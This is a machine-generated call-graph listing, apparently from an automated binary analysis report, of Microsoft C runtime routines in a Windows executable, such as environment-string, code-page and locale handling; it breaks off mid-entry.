7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18284->18285 18287 7ff79f63fca7 18285->18287 18288 7ff79f63fcb8 18286->18288 18292 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18287->18292 18289 7ff79f63fd4b 18288->18289 18290 7ff79f63fcc0 18288->18290 18291 7ff79f639dd0 _wfindfirst32i64 17 API calls 18289->18291 18432 7ff79f6465c4 18290->18432 18294 7ff79f63fd5f 18291->18294 18292->18260 18296 7ff79f63fd88 18294->18296 18306 7ff79f63fd98 18294->18306 18299 7ff79f634444 _findclose 11 API calls 18296->18299 18297 7ff79f63fd08 18300 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18297->18300 18298 7ff79f63fce7 18301 7ff79f634444 _findclose 11 API calls 18298->18301 18302 7ff79f63fd8d 18299->18302 18300->18277 18303 7ff79f63fcec 18301->18303 18304 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18303->18304 18304->18287 18305 7ff79f64007b 18308 7ff79f634444 _findclose 11 API calls 18305->18308 18306->18305 18307 7ff79f63fdba 18306->18307 18312 7ff79f63fdd7 18307->18312 18451 7ff79f6401ac 18307->18451 18309 7ff79f640080 18308->18309 18311 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18309->18311 18311->18302 18313 7ff79f63fe4b 18312->18313 18314 7ff79f63fdff 18312->18314 18323 7ff79f63fe3f 18312->18323 18317 7ff79f63fe73 18313->18317 18319 7ff79f63dd40 _findclose 11 API calls 18313->18319 18333 7ff79f63fe0e 18313->18333 18466 7ff79f638554 18314->18466 18315 7ff79f63fefe 18328 7ff79f63ff1b 18315->18328 18334 7ff79f63ff6e 18315->18334 18321 7ff79f63dd40 _findclose 11 API calls 18317->18321 18317->18323 18317->18333 18324 7ff79f63fe65 18319->18324 18327 7ff79f63fe95 18321->18327 18322 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18322->18302 18323->18315 18323->18333 18472 7ff79f64636c 18323->18472 18329 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18324->18329 18325 7ff79f63fe09 18330 7ff79f634444 _findclose 11 API calls 18325->18330 18326 7ff79f63fe27 18326->18323 18336 7ff79f6401ac 45 API calls 18326->18336 18331 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18327->18331 18332 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18328->18332 18329->18317 18330->18333 18331->18323 18335 7ff79f63ff24 18332->18335 18333->18322 18334->18333 18337 7ff79f6424fc 40 API calls 18334->18337 18339 7ff79f6424fc 40 API calls 18335->18339 18341 7ff79f63ff2a 18335->18341 18336->18323 18338 7ff79f63ffac 18337->18338 18340 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18338->18340 18343 7ff79f63ff56 18339->18343 18344 7ff79f63ffb6 18340->18344 18342 7ff79f64006f 18341->18342 18347 7ff79f63dd40 _findclose 11 API calls 18341->18347 18346 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18342->18346 18345 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18343->18345 18344->18333 18344->18341 18345->18341 18346->18302 18348 7ff79f63fffb 18347->18348 18349 7ff79f64000c 18348->18349 18350 7ff79f640003 18348->18350 18352 7ff79f63f924 _wfindfirst32i64 37 API calls 18349->18352 18351 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18350->18351 18353 7ff79f64000a 18351->18353 18354 7ff79f64001a 18352->18354 18358 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18353->18358 18355 7ff79f640022 SetEnvironmentVariableW 18354->18355 18356 7ff79f6400af 18354->18356 18359 7ff79f640067 18355->18359 18360 7ff79f640046 18355->18360 18357 7ff79f639dd0 _wfindfirst32i64 17 API calls 18356->18357 18361 7ff79f6400c3 18357->18361 18358->18302 18362 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18359->18362 18363 7ff79f634444 _findclose 11 API calls 18360->18363 18362->18342 18364 7ff79f64004b 18363->18364 18365 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18364->18365 18365->18353 18367 7ff79f6400f9 18366->18367 18374 7ff79f6400e1 18366->18374 18368 7ff79f63dd40 _findclose 11 API calls 18367->18368 18369 7ff79f64011d 18368->18369 18370 7ff79f64017e 18369->18370 18375 7ff79f63dd40 _findclose 11 API calls 18369->18375 18376 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18369->18376 18377 7ff79f6391ac __std_exception_copy 37 API calls 18369->18377 18378 7ff79f64018d 18369->18378 18380 7ff79f6401a2 18369->18380 18372 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18370->18372 18371 7ff79f63920c _CreateFrameInfo 45 API calls 18373 7ff79f6401a8 18371->18373 18372->18374 18374->18242 18375->18369 18376->18369 18377->18369 18379 7ff79f639dd0 _wfindfirst32i64 17 API calls 18378->18379 18379->18380 18380->18371 18382 7ff79f638528 18381->18382 18383 7ff79f638531 18381->18383 18382->18383 18496 7ff79f637ff0 18382->18496 18383->18257 18383->18258 18388 7ff79f6464b9 18387->18388 18389 7ff79f64565c 18387->18389 18391 7ff79f634a1c 45 API calls 18388->18391 18390 7ff79f645669 18389->18390 18397 7ff79f64569f 18389->18397 18392 7ff79f634444 _findclose 11 API calls 18390->18392 18398 7ff79f645610 18390->18398 18393 7ff79f6464ed 18391->18393 18396 7ff79f645673 18392->18396 18402 7ff79f646503 18393->18402 18403 7ff79f64651a 18393->18403 18417 7ff79f6464f2 18393->18417 18394 7ff79f6456c9 18395 7ff79f634444 _findclose 11 API calls 18394->18395 18399 7ff79f6456ce 18395->18399 18400 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 18396->18400 18397->18394 18401 7ff79f6456ee 18397->18401 18398->18255 18405 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 18399->18405 18406 7ff79f64567e 18400->18406 18410 7ff79f634a1c 45 API calls 18401->18410 18413 7ff79f6456d9 18401->18413 18404 7ff79f634444 _findclose 11 API calls 18402->18404 18408 7ff79f646536 18403->18408 18409 7ff79f646524 18403->18409 18407 7ff79f646508 18404->18407 18405->18413 18406->18255 18411 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 18407->18411 18414 7ff79f646547 18408->18414 18415 7ff79f64655e 18408->18415 18412 7ff79f634444 _findclose 11 API calls 18409->18412 18410->18413 18411->18417 18418 7ff79f646529 18412->18418 18413->18255 18728 7ff79f6456ac 18414->18728 18737 7ff79f648388 18415->18737 18417->18255 18421 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 18418->18421 18421->18417 18422 7ff79f634444 _findclose 11 API calls 18422->18417 18424 7ff79f64251e 18423->18424 18425 7ff79f64253b 18423->18425 18424->18425 18426 7ff79f64252c 18424->18426 18427 7ff79f642545 18425->18427 18777 7ff79f646fb8 18425->18777 18428 7ff79f634444 _findclose 11 API calls 18426->18428 18784 7ff79f63f98c 18427->18784 18431 7ff79f642531 memcpy_s 18428->18431 18431->18278 18433 7ff79f634a1c 45 API calls 18432->18433 18434 7ff79f64662a 18433->18434 18435 7ff79f646638 18434->18435 18436 7ff79f63dfcc 5 API calls 18434->18436 18437 7ff79f634504 14 API calls 18435->18437 18436->18435 18438 7ff79f646694 18437->18438 18439 7ff79f646724 18438->18439 18440 7ff79f634a1c 45 API calls 18438->18440 18441 7ff79f646735 18439->18441 18443 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18439->18443 18442 7ff79f6466a7 18440->18442 18444 7ff79f63fce3 18441->18444 18446 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18441->18446 18445 7ff79f63dfcc 5 API calls 18442->18445 18447 7ff79f6466b0 18442->18447 18443->18441 18444->18297 18444->18298 18445->18447 18446->18444 18448 7ff79f634504 14 API calls 18447->18448 18449 7ff79f64670b 18448->18449 18449->18439 18450 7ff79f646713 SetEnvironmentVariableW 18449->18450 18450->18439 18452 7ff79f6401ec 18451->18452 18453 7ff79f6401cf 18451->18453 18454 7ff79f63dd40 _findclose 11 API calls 18452->18454 18453->18312 18460 7ff79f640210 18454->18460 18455 7ff79f63920c _CreateFrameInfo 45 API calls 18457 7ff79f64029a 18455->18457 18456 7ff79f640271 18458 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18456->18458 18458->18453 18459 7ff79f63dd40 _findclose 11 API calls 18459->18460 18460->18456 18460->18459 18461 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18460->18461 18462 7ff79f63f924 _wfindfirst32i64 37 API calls 18460->18462 18463 7ff79f640280 18460->18463 18465 7ff79f640294 18460->18465 18461->18460 18462->18460 18464 7ff79f639dd0 _wfindfirst32i64 17 API calls 18463->18464 18464->18465 18465->18455 18467 7ff79f638564 18466->18467 18470 7ff79f63856d 18466->18470 18467->18470 18796 7ff79f638064 18467->18796 18470->18325 18470->18326 18473 7ff79f646379 18472->18473 18478 7ff79f6463a6 18472->18478 18474 7ff79f64637e 18473->18474 18473->18478 18475 7ff79f634444 _findclose 11 API calls 18474->18475 18476 7ff79f646383 18475->18476 18479 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 18476->18479 18477 7ff79f6463ea 18481 7ff79f634444 _findclose 11 API calls 18477->18481 18478->18477 18480 7ff79f646409 18478->18480 18494 7ff79f6463de __crtLCMapStringW 18478->18494 18483 7ff79f64638e 18479->18483 18484 7ff79f646425 18480->18484 18485 7ff79f646413 18480->18485 18482 7ff79f6463ef 18481->18482 18486 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 18482->18486 18483->18323 18488 7ff79f634a1c 45 API calls 18484->18488 18487 7ff79f634444 _findclose 11 API calls 18485->18487 18486->18494 18489 7ff79f646418 18487->18489 18490 7ff79f646432 18488->18490 18491 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 18489->18491 18490->18494 18843 7ff79f647f44 18490->18843 18491->18494 18494->18323 18495 7ff79f634444 _findclose 11 API calls 18495->18494 18497 7ff79f638009 18496->18497 18510 7ff79f638005 18496->18510 18519 7ff79f641730 18497->18519 18502 7ff79f638027 18545 7ff79f6380d4 18502->18545 18503 7ff79f63801b 18504 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18503->18504 18504->18510 18507 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18508 7ff79f63804e 18507->18508 18509 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18508->18509 18509->18510 18510->18383 18511 7ff79f638344 18510->18511 18512 7ff79f63836d 18511->18512 18517 7ff79f638386 18511->18517 18512->18383 18513 7ff79f63f0b8 WideCharToMultiByte 18513->18517 18514 7ff79f63dd40 _findclose 11 API calls 18514->18517 18515 7ff79f638416 18516 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18515->18516 18516->18512 18517->18512 18517->18513 18517->18514 18517->18515 18518 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18517->18518 18518->18517 18520 7ff79f63800e 18519->18520 18521 7ff79f64173d 18519->18521 18525 7ff79f641a6c GetEnvironmentStringsW 18520->18525 18564 7ff79f63a6f4 18521->18564 18526 7ff79f641a9c 18525->18526 18527 7ff79f638013 18525->18527 18528 7ff79f63f0b8 WideCharToMultiByte 18526->18528 18527->18502 18527->18503 18529 7ff79f641aed 18528->18529 18530 7ff79f641af4 FreeEnvironmentStringsW 18529->18530 18531 7ff79f63cacc _fread_nolock 12 API calls 18529->18531 18530->18527 18532 7ff79f641b07 18531->18532 18533 7ff79f641b18 18532->18533 18534 7ff79f641b0f 18532->18534 18536 7ff79f63f0b8 WideCharToMultiByte 18533->18536 18535 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18534->18535 18537 7ff79f641b16 18535->18537 18538 7ff79f641b3b 18536->18538 18537->18530 18539 7ff79f641b49 18538->18539 18540 7ff79f641b3f 18538->18540 18542 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18539->18542 18541 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18540->18541 18543 7ff79f641b47 FreeEnvironmentStringsW 18541->18543 18542->18543 18543->18527 18546 7ff79f6380f9 18545->18546 18547 7ff79f63dd40 _findclose 11 API calls 18546->18547 18558 7ff79f63812f 18547->18558 18548 7ff79f638137 18549 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18548->18549 18550 7ff79f63802f 18549->18550 18550->18507 18551 7ff79f6381aa 18552 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18551->18552 18552->18550 18553 7ff79f63dd40 _findclose 11 API calls 18553->18558 18554 7ff79f638199 18556 7ff79f638300 11 API calls 18554->18556 18555 7ff79f6391ac __std_exception_copy 37 API calls 18555->18558 18557 7ff79f6381a1 18556->18557 18560 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18557->18560 18558->18548 18558->18551 18558->18553 18558->18554 18558->18555 18559 7ff79f6381cf 18558->18559 18562 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18558->18562 18561 7ff79f639dd0 _wfindfirst32i64 17 API calls 18559->18561 18560->18548 18563 7ff79f6381e2 18561->18563 18562->18558 18565 7ff79f63a720 FlsSetValue 18564->18565 18566 7ff79f63a705 FlsGetValue 18564->18566 18568 7ff79f63a712 18565->18568 18569 7ff79f63a72d 18565->18569 18567 7ff79f63a71a 18566->18567 18566->18568 18567->18565 18571 7ff79f63920c _CreateFrameInfo 45 API calls 18568->18571 18573 7ff79f63a718 18568->18573 18570 7ff79f63dd40 _findclose 11 API calls 18569->18570 18572 7ff79f63a73c 18570->18572 18574 7ff79f63a795 18571->18574 18575 7ff79f63a75a FlsSetValue 18572->18575 18576 7ff79f63a74a FlsSetValue 18572->18576 18584 7ff79f641404 18573->18584 18578 7ff79f63a778 18575->18578 18579 7ff79f63a766 FlsSetValue 18575->18579 18577 7ff79f63a753 18576->18577 18580 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18577->18580 18581 7ff79f63a3c4 _findclose 11 API calls 18578->18581 18579->18577 18580->18568 18582 7ff79f63a780 18581->18582 18583 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18582->18583 18583->18573 18607 7ff79f641674 18584->18607 18586 7ff79f641439 18622 7ff79f641104 18586->18622 18589 7ff79f641456 18589->18520 18590 7ff79f63cacc _fread_nolock 12 API calls 18591 7ff79f641467 18590->18591 18592 7ff79f64146f 18591->18592 18594 7ff79f64147e 18591->18594 18593 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18592->18593 18593->18589 18594->18594 18629 7ff79f6417ac 18594->18629 18597 7ff79f64157a 18598 7ff79f634444 _findclose 11 API calls 18597->18598 18600 7ff79f64157f 18598->18600 18599 7ff79f6415d5 18602 7ff79f64163c 18599->18602 18640 7ff79f640f34 18599->18640 18603 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18600->18603 18601 7ff79f641594 18601->18599 18604 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18601->18604 18606 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18602->18606 18603->18589 18604->18599 18606->18589 18608 7ff79f641697 18607->18608 18609 7ff79f6416a1 18608->18609 18655 7ff79f63f788 EnterCriticalSection 18608->18655 18612 7ff79f641713 18609->18612 18614 7ff79f63920c _CreateFrameInfo 45 API calls 18609->18614 18612->18586 18616 7ff79f64172b 18614->18616 18618 7ff79f641782 18616->18618 18619 7ff79f63a6f4 50 API calls 18616->18619 18618->18586 18620 7ff79f64176c 18619->18620 18621 7ff79f641404 65 API calls 18620->18621 18621->18618 18623 7ff79f634a1c 45 API calls 18622->18623 18624 7ff79f641118 18623->18624 18625 7ff79f641136 18624->18625 18626 7ff79f641124 GetOEMCP 18624->18626 18627 7ff79f64113b GetACP 18625->18627 18628 7ff79f64114b 18625->18628 18626->18628 18627->18628 18628->18589 18628->18590 18630 7ff79f641104 47 API calls 18629->18630 18631 7ff79f6417d9 18630->18631 18632 7ff79f641816 IsValidCodePage 18631->18632 18638 7ff79f64192f 18631->18638 18639 7ff79f641830 memcpy_s 18631->18639 18634 7ff79f641827 18632->18634 18632->18638 18633 7ff79f62ad80 _wfindfirst32i64 8 API calls 18635 7ff79f641571 18633->18635 18636 7ff79f641856 GetCPInfo 18634->18636 18634->18639 18635->18597 18635->18601 18636->18638 18636->18639 18638->18633 18656 7ff79f64121c 18639->18656 18727 7ff79f63f788 EnterCriticalSection 18640->18727 18657 7ff79f641259 GetCPInfo 18656->18657 18666 7ff79f64134f 18656->18666 18663 7ff79f64126c 18657->18663 18657->18666 18658 7ff79f62ad80 _wfindfirst32i64 8 API calls 18659 7ff79f6413ee 18658->18659 18659->18638 18667 7ff79f641f60 18663->18667 18665 7ff79f646f04 54 API calls 18665->18666 18666->18658 18668 7ff79f634a1c 45 API calls 18667->18668 18669 7ff79f641fa2 18668->18669 18670 7ff79f63e7f0 _fread_nolock MultiByteToWideChar 18669->18670 18671 7ff79f641fd8 18670->18671 18672 7ff79f641fdf 18671->18672 18673 7ff79f64209c 18671->18673 18674 7ff79f63cacc _fread_nolock 12 API calls 18671->18674 18678 7ff79f642008 memcpy_s 18671->18678 18675 7ff79f62ad80 _wfindfirst32i64 8 API calls 18672->18675 18673->18672 18677 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18673->18677 18674->18678 18676 7ff79f6412e3 18675->18676 18682 7ff79f646f04 18676->18682 18677->18672 18678->18673 18679 7ff79f63e7f0 _fread_nolock MultiByteToWideChar 18678->18679 18680 7ff79f64207e 18679->18680 18680->18673 18681 7ff79f642082 GetStringTypeW 18680->18681 18681->18673 18683 7ff79f634a1c 45 API calls 18682->18683 18684 7ff79f646f29 18683->18684 18687 7ff79f646bd0 18684->18687 18688 7ff79f646c11 18687->18688 18689 7ff79f63e7f0 _fread_nolock MultiByteToWideChar 18688->18689 18692 7ff79f646c5b 18689->18692 18690 7ff79f646ed9 18691 7ff79f62ad80 _wfindfirst32i64 8 API calls 18690->18691 18693 7ff79f641316 18691->18693 18692->18690 18694 7ff79f63cacc _fread_nolock 12 API calls 18692->18694 18696 7ff79f646c93 18692->18696 18707 7ff79f646d91 18692->18707 18693->18665 18694->18696 18695 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18695->18690 18697 7ff79f63e7f0 _fread_nolock MultiByteToWideChar 18696->18697 18696->18707 18698 7ff79f646d06 18697->18698 18698->18707 18718 7ff79f63e18c 18698->18718 18701 7ff79f646d51 18704 7ff79f63e18c __crtLCMapStringW 6 API calls 18701->18704 18701->18707 18702 7ff79f646da2 18703 7ff79f63cacc _fread_nolock 12 API calls 18702->18703 18705 7ff79f646e74 18702->18705 18706 7ff79f646dc0 18702->18706 18703->18706 18704->18707 18705->18707 18708 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18705->18708 18706->18707 18709 7ff79f63e18c __crtLCMapStringW 6 API calls 18706->18709 18707->18690 18707->18695 18708->18707 18710 7ff79f646e40 18709->18710 18710->18705 18711 7ff79f646e60 18710->18711 18712 7ff79f646e76 18710->18712 18713 7ff79f63f0b8 WideCharToMultiByte 18711->18713 18714 7ff79f63f0b8 WideCharToMultiByte 18712->18714 18715 7ff79f646e6e 18713->18715 18714->18715 18715->18705 18716 7ff79f646e8e 18715->18716 18716->18707 18717 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18716->18717 18717->18707 18719 7ff79f63ddb8 __crtLCMapStringW 5 API calls 18718->18719 18720 7ff79f63e1ca 18719->18720 18721 7ff79f63e1d2 18720->18721 18724 7ff79f63e278 18720->18724 18721->18701 18721->18702 18721->18707 18723 7ff79f63e23b LCMapStringW 18723->18721 18725 7ff79f63ddb8 __crtLCMapStringW 5 API calls 18724->18725 18726 7ff79f63e2a6 __crtLCMapStringW 18725->18726 18726->18723 18729 7ff79f6456c9 18728->18729 18730 7ff79f6456e0 18728->18730 18731 7ff79f634444 _findclose 11 API calls 18729->18731 18730->18729 18733 7ff79f6456ee 18730->18733 18732 7ff79f6456ce 18731->18732 18734 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 18732->18734 18735 7ff79f634a1c 45 API calls 18733->18735 18736 7ff79f6456d9 18733->18736 18734->18736 18735->18736 18736->18417 18738 7ff79f634a1c 45 API calls 18737->18738 18739 7ff79f6483ad 18738->18739 18742 7ff79f648004 18739->18742 18745 7ff79f648052 18742->18745 18743 7ff79f62ad80 _wfindfirst32i64 8 API calls 18744 7ff79f646585 18743->18744 18744->18417 18744->18422 18746 7ff79f6480d9 18745->18746 18748 7ff79f6480c4 GetCPInfo 18745->18748 18751 7ff79f6480dd 18745->18751 18747 7ff79f63e7f0 _fread_nolock MultiByteToWideChar 18746->18747 18746->18751 18749 7ff79f648171 18747->18749 18748->18746 18748->18751 18750 7ff79f63cacc _fread_nolock 12 API calls 18749->18750 18749->18751 18752 7ff79f6481a8 18749->18752 18750->18752 18751->18743 18752->18751 18753 7ff79f63e7f0 _fread_nolock MultiByteToWideChar 18752->18753 18754 7ff79f648216 18753->18754 18755 7ff79f6482f8 18754->18755 18756 7ff79f63e7f0 _fread_nolock MultiByteToWideChar 18754->18756 18755->18751 18757 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18755->18757 18758 7ff79f64823c 18756->18758 18757->18751 18758->18755 18759 7ff79f63cacc _fread_nolock 12 API calls 18758->18759 18760 7ff79f648269 18758->18760 18759->18760 18760->18755 18761 7ff79f63e7f0 _fread_nolock MultiByteToWideChar 18760->18761 18762 7ff79f6482e0 18761->18762 18763 7ff79f6482e6 18762->18763 18764 7ff79f648300 18762->18764 18763->18755 18766 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18763->18766 18771 7ff79f63e010 18764->18771 18766->18755 18768 7ff79f64833f 18768->18751 18770 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18768->18770 18769 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18769->18768 18770->18751 18772 7ff79f63ddb8 __crtLCMapStringW 5 API calls 18771->18772 18773 7ff79f63e04e 18772->18773 18774 7ff79f63e278 __crtLCMapStringW 5 API calls 18773->18774 18776 7ff79f63e056 18773->18776 18775 7ff79f63e0bf CompareStringW 18774->18775 18775->18776 18776->18768 18776->18769 18778 7ff79f646fda HeapSize 18777->18778 18779 7ff79f646fc1 18777->18779 18780 7ff79f634444 _findclose 11 API calls 18779->18780 18781 7ff79f646fc6 18780->18781 18782 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 18781->18782 18783 7ff79f646fd1 18782->18783 18783->18427 18785 7ff79f63f9ab 18784->18785 18786 7ff79f63f9a1 18784->18786 18788 7ff79f63f9b0 18785->18788 18794 7ff79f63f9b7 _findclose 18785->18794 18787 7ff79f63cacc _fread_nolock 12 API calls 18786->18787 18792 7ff79f63f9a9 18787->18792 18789 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18788->18789 18789->18792 18790 7ff79f63f9ea HeapReAlloc 18790->18792 18790->18794 18791 7ff79f63f9bd 18793 7ff79f634444 _findclose 11 API calls 18791->18793 18792->18431 18793->18792 18794->18790 18794->18791 18795 7ff79f6426b0 _findclose 2 API calls 18794->18795 18795->18794 18797 7ff79f63807d 18796->18797 18798 7ff79f638079 18796->18798 18817 7ff79f641b7c GetEnvironmentStringsW 18797->18817 18798->18470 18809 7ff79f638424 18798->18809 18801 7ff79f63808a 18804 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18801->18804 18802 7ff79f638096 18824 7ff79f6381e4 18802->18824 18804->18798 18806 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18807 7ff79f6380bd 18806->18807 18808 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18807->18808 18808->18798 18810 7ff79f638447 18809->18810 18815 7ff79f63845e 18809->18815 18810->18470 18811 7ff79f63e7f0 MultiByteToWideChar _fread_nolock 18811->18815 18812 7ff79f63dd40 _findclose 11 API calls 18812->18815 18813 7ff79f6384d2 18814 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18813->18814 18814->18810 18815->18810 18815->18811 18815->18812 18815->18813 18816 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18815->18816 18816->18815 18818 7ff79f641ba0 18817->18818 18819 7ff79f638082 18817->18819 18820 7ff79f63cacc _fread_nolock 12 API calls 18818->18820 18819->18801 18819->18802 18822 7ff79f641bd7 memcpy_s 18820->18822 18821 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18823 7ff79f641bf7 FreeEnvironmentStringsW 18821->18823 18822->18821 18823->18819 18826 7ff79f63820c 18824->18826 18825 7ff79f63dd40 _findclose 11 API calls 18838 7ff79f638247 18825->18838 18826->18825 18827 7ff79f63824f 18828 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18827->18828 18829 7ff79f63809e 18828->18829 18829->18806 18830 7ff79f6382c9 18831 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18830->18831 18831->18829 18832 7ff79f63dd40 _findclose 11 API calls 18832->18838 18833 7ff79f6382b8 18835 7ff79f638300 11 API calls 18833->18835 18834 7ff79f63f924 _wfindfirst32i64 37 API calls 18834->18838 18836 7ff79f6382c0 18835->18836 18839 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18836->18839 18837 7ff79f6382ec 18841 7ff79f639dd0 _wfindfirst32i64 17 API calls 18837->18841 18838->18827 18838->18830 18838->18832 18838->18833 18838->18834 18838->18837 18840 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18838->18840 18839->18827 18840->18838 18842 7ff79f6382fe 18841->18842 18844 7ff79f647f6d __crtLCMapStringW 18843->18844 18845 7ff79f64646e 18844->18845 18846 7ff79f63e010 6 API calls 18844->18846 18845->18494 18845->18495 18846->18845 17763 7ff79f634290 17764 7ff79f63429b 17763->17764 17772 7ff79f63e354 17764->17772 17785 7ff79f63f788 EnterCriticalSection 17772->17785 18938 7ff79f6496f9 18939 7ff79f649708 18938->18939 18940 7ff79f649712 18938->18940 18942 7ff79f63f7e8 LeaveCriticalSection 18939->18942 18960 7ff79f6407f0 18971 7ff79f646764 18960->18971 18972 7ff79f646771 18971->18972 18973 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18972->18973 18974 7ff79f64678d 18972->18974 18973->18972 18975 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18974->18975 18976 7ff79f6407f9 18974->18976 18975->18974 18977 7ff79f63f788 EnterCriticalSection 18976->18977 18978 7ff79f63b9f0 18989 7ff79f63f788 EnterCriticalSection 18978->18989 17693 7ff79f62a370 17694 7ff79f62a39e 17693->17694 17695 7ff79f62a385 17693->17695 17695->17694 17697 7ff79f63cacc 12 API calls 17695->17697 17696 7ff79f62a3fc 17697->17696 18990 7ff79f6494de 18991 7ff79f6494ee 18990->18991 18994 7ff79f6342f8 LeaveCriticalSection 18991->18994 14686 7ff79f63e8dc 14687 7ff79f63eace 14686->14687 14689 7ff79f63e91e _isindst 14686->14689 14739 7ff79f634444 14687->14739 14689->14687 14692 7ff79f63e99e _isindst 14689->14692 14707 7ff79f6453b4 14692->14707 14697 7ff79f63eafa 14751 7ff79f639dd0 IsProcessorFeaturePresent 14697->14751 14704 7ff79f63e9fb 14706 7ff79f63eabe 14704->14706 14732 7ff79f6453f8 14704->14732 14742 7ff79f62ad80 14706->14742 14708 7ff79f63e9bc 14707->14708 14709 7ff79f6453c3 14707->14709 14714 7ff79f6447b8 14708->14714 14755 7ff79f63f788 EnterCriticalSection 14709->14755 14715 7ff79f6447c1 14714->14715 14719 7ff79f63e9d1 14714->14719 14716 7ff79f634444 _findclose 11 API calls 14715->14716 14717 7ff79f6447c6 14716->14717 14756 7ff79f639db0 14717->14756 14719->14697 14720 7ff79f6447e8 14719->14720 14721 7ff79f63e9e2 14720->14721 14722 7ff79f6447f1 14720->14722 14721->14697 14726 7ff79f644818 14721->14726 14723 7ff79f634444 _findclose 11 API calls 14722->14723 14724 7ff79f6447f6 14723->14724 14725 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 14724->14725 14725->14721 14727 7ff79f63e9f3 14726->14727 14728 7ff79f644821 14726->14728 14727->14697 14727->14704 14729 7ff79f634444 _findclose 11 API calls 14728->14729 14730 7ff79f644826 14729->14730 14731 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 14730->14731 14731->14727 14837 7ff79f63f788 EnterCriticalSection 14732->14837 14838 7ff79f63a798 GetLastError 14739->14838 14741 7ff79f63444d 14741->14706 14743 7ff79f62ad89 14742->14743 14744 7ff79f62ad94 14743->14744 14745 7ff79f62ae40 IsProcessorFeaturePresent 14743->14745 14746 7ff79f62ae58 14745->14746 14855 7ff79f62b034 RtlCaptureContext 14746->14855 14752 7ff79f639de3 14751->14752 14860 7ff79f639ae4 14752->14860 14758 7ff79f639c48 14756->14758 14759 